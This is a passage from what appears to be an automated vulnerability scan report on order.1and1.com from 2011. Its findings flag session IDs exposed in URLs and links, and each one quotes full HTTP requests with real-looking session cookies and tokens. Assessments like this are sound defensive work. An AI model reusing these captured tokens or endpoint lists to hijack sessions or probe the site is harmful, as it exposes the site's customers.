<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.110. http://order.1and1.com/xml/order/popupDomainPrices

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/popupDomainPrices

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/popupDomainPrices;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:48:09 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 22:02:16 GMT; Path=/
ETag: e45563522176fd4cc17107a164b81314
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20311


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.111. http://order.1and1.com/xml/order/popupDomainPrices

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/popupDomainPrices

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/popupDomainPrices;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:48:09 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 22:02:16 GMT; Path=/
ETag: e45563522176fd4cc17107a164b81314
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20311


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=popupDomainPrices&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=popupDomainPrices&amp;page=switch&amp;linkOrigin=popupDomainPrices&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?linkType=&amp;linkOrigin=&amp;linkid=hd.tab.packageselection"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.tab.chooseadomain" rel="button-hd-tab-chooseadomain"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li style="float:right;"><a class="auswahl" href="/xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.tab.yourcart" rel="button-hd-tab-yourcart" title="Ihre Auswahl im &Uuml;berblick (Warenkorb)"><span>
...[SNIP]...
<br><a rel="blank" class="target" href="/xml/order/TcSpecialOffers;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">Click here</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=popupDomainPrices&amp;linkOrigin=popupDomainPrices&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.112. http://order.1and1.com/xml/order/popupGreenPower

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/popupGreenPower

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/popupGreenPower;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:34:56 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupGreenPower?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.113. http://order.1and1.com/xml/order/popupPayPalInfo

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/popupPayPalInfo

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/popupPayPalInfo;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:50:23 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupPayPalInfo?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.114. http://order.1and1.com/xml/order/popupServerOsCds

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/popupServerOsCds

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/popupServerOsCds;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:50:02 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupServerOsCds?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.115. http://order.1and1.com/xml/order/popupServerOsVps

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/popupServerOsVps

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/popupServerOsVps;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:51:30 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupServerOsVps?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.116. http://order.1and1.com/xml/order/popupTcGoogleAdwords

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/popupTcGoogleAdwords

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/popupTcGoogleAdwords;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:46:33 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupTcGoogleAdwords?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.117. http://order.1and1.com/xml/order/popupWebsiteMagazine

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/popupWebsiteMagazine

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/popupWebsiteMagazine;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:35:53 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupWebsiteMagazine?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.118. http://order.1and1.com/xml/order/sitedesign

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/sitedesign

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/sitedesign;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:34:54 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/sitedesign?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.119. http://order.1and1.com/xml/order/tariffselect

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/tariffselect

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static&__sendingdata=1&packageselection=Hosting&cart.action=add-bundle&cart.bundle=tariff-beginner-package-bundle HTTP/1.1
Host: order.1and1.com
